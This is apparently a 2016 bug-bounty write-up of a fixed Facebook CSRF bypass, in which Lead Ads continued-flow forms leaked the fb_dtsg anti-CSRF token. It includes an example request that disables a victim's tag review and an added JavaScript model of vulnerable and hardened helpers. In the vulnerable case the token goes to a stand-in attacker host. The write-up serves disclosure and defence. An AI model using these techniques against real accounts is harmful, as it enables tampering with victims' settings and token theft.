Tuesday, May 17, 2016

How I bypassed Facebook CSRF once again!


I found a vulnerability in Facebook that let me create an arbitrary form, hosted on Facebook, that sends a POST request carrying the victim's anti-CSRF token to any Facebook endpoint or to an external host!

It was very similar to this bug, which I found in 2015.

The 'fb_dtsg' anti-CSRF token is supposed to be validated server-side:
if an action request doesn't carry that token, Facebook drops the request without processing it!
( not all actions, you may find some that don't check it ;-) )

I found this vulnerability in the Continued Flow section of Lead Ads!

A continued flow lead ad means the final step is completed on the advertiser's website. The lead ad will collect all of the data provided and pass it to a destination URL using a hash or POST request. This is valuable for flows where you need data that Facebook is unwilling to collect (e.g. passwords for creating an account).

Root Cause

Continued flow used Facebook's generic POST helper to hand the lead data to the destination URL, and that helper adds fb_dtsg to every request it sends, no matter where the request goes.


So we need to create a continued flow lead ad, and according to the documentation this is only available to whitelisted users.
But I bypassed this restriction with a simple trick.

Whenever a user creates a lead ad form, a JSON object containing the form data is sent to the create endpoint.
Fortunately I found another endpoint that returns already-created forms as JSON, and there I saw these keys:

form JSON

I added these keys, with modified values, to the form builder JSON, and the form was created with continued flow enabled.
There was no server-side check of the whitelist on the create endpoint ...

For example, to disable the timeline review setting (tag approval) for the victim:
Endpoint URL: https://facebook.com/ajax/settings/timeline/review.php
Body: tag_approval_enabled=0
Final URL: https://facebook.com/ajax/settings/timeline/review.php?tag_approval_enabled=0&__a=1

Finally I tested it with Facebook Tools and it worked!


YouTube removed the original video for an unknown reason!
So I moved my videos to Facebook :)

Fun Part: 

When the custom field name was fb_dtsg ... :D
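To make the root cause concrete, here is an added example (not code from the original post and not Facebook's code) that models a "post the collected lead data to a destination URL" helper in two shapes: the vulnerable shape the post describes, where the anti-CSRF token is attached to every request and the advertiser's custom fields are merged on top of it, and a hardened shape that never attaches the token to a third-party hand-off, refuses first-party destinations, and rejects reserved field names. The hostnames, the collector URL, the token value, the function names and the assumption that a custom field named fb_dtsg overwrites the real token (one reading of the "fun part" above; the post does not say what actually happened) are all constructed for the illustration.

```javascript
// Added example, not code from the original post or from Facebook.
// Hostnames, helper names and the sample token are assumptions.

const APP_HOST = "facebook.com";              // assumed first-party host
const RESERVED_FIELDS = new Set(["fb_dtsg"]); // assumed: names only the helper may set

// Is this hostname the first-party site (facebook.com or a subdomain of it)?
function isAppHost(hostname) {
  return hostname === APP_HOST || hostname.endsWith("." + APP_HOST);
}

// Vulnerable shape, as the post describes it: the anti-CSRF token is added to
// every request regardless of destination, and advertiser-supplied fields are
// merged afterwards, so a custom field named fb_dtsg overwrites the real token.
function buildPostVulnerable(destination, fields, token) {
  const body = { fb_dtsg: token };
  for (const [name, value] of Object.entries(fields)) {
    body[name] = String(value);
  }
  return { url: destination, body };
}

// Hardened shape for handing data to a third party:
//  - the destination must parse as an https URL,
//  - it must not be the first-party host (a lead-ad destination is the
//    advertiser's site; a first-party target is a CSRF attempt),
//  - advertiser fields may not use reserved names,
//  - the anti-CSRF token is never attached, because the request is not an
//    action against the first-party site.
function buildPostHardened(destination, fields) {
  let url;
  try {
    url = new URL(destination);
  } catch (e) {
    throw new Error("destination is not a valid URL");
  }
  if (url.protocol !== "https:") {
    throw new Error("destination must use https");
  }
  if (isAppHost(url.hostname)) {
    throw new Error("destination must not be a first-party endpoint");
  }
  const body = {};
  for (const [name, value] of Object.entries(fields)) {
    if (RESERVED_FIELDS.has(name)) {
      throw new Error("reserved field name: " + name);
    }
    body[name] = String(value);
  }
  return { url: url.href, body };
}

// Serialise a body the way the post's "Final URL" shows it: form-encoded.
function encodeBody(body) {
  return new URLSearchParams(body).toString();
}

// Constructed sample inputs mirroring the post's timeline-review example and
// an attacker-controlled collector host (not real hosts or tokens).
const TOKEN = "AQHx-example-token";
const REVIEW_ENDPOINT = "https://facebook.com/ajax/settings/timeline/review.php";
const COLLECTOR = "https://collector.attacker.example/lead";

// CSRF against a first-party endpoint: the victim's token rides along.
console.log(encodeBody(buildPostVulnerable(REVIEW_ENDPOINT, { tag_approval_enabled: "0" }, TOKEN).body));
// Token leak: the same helper ships fb_dtsg to the attacker's collector.
console.log(encodeBody(buildPostVulnerable(COLLECTOR, { email: "victim@example.com" }, TOKEN).body));
// Hardened hand-off: no token, and a first-party destination is refused.
console.log(encodeBody(buildPostHardened(COLLECTOR, { email: "victim@example.com" }).body));
```

The point of the hardened shape is separation of concerns: a helper that performs authenticated first-party actions and a helper that hands data to a third party are different things, and the anti-CSRF token belongs only to the first. Checking the destination host is what stops the "post to any Facebook endpoint" path; not attaching the token is what stops the "leak to an external host" path; rejecting reserved names is what stops an advertiser-defined field from colliding with the token field.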


  •  Mar 29 2016 "Like last year ;)" : Initial report
  •  Apr 06 2016 : Requested more info
  •  Apr 06 2016 : More details sent
  •  Apr 07 2016 : Bug acknowledged by security team
  •  Apr 07 2016 : Fun part sent!
  •  Apr 12 2016 : Bug fixed
  •  Apr 13 2016 : Facebook security team rewarded me with a $7,500 bounty
  •  Apr 18 2016 : More info about the whitelist bypass sent
  •  May 06 2016 : Second bug fixed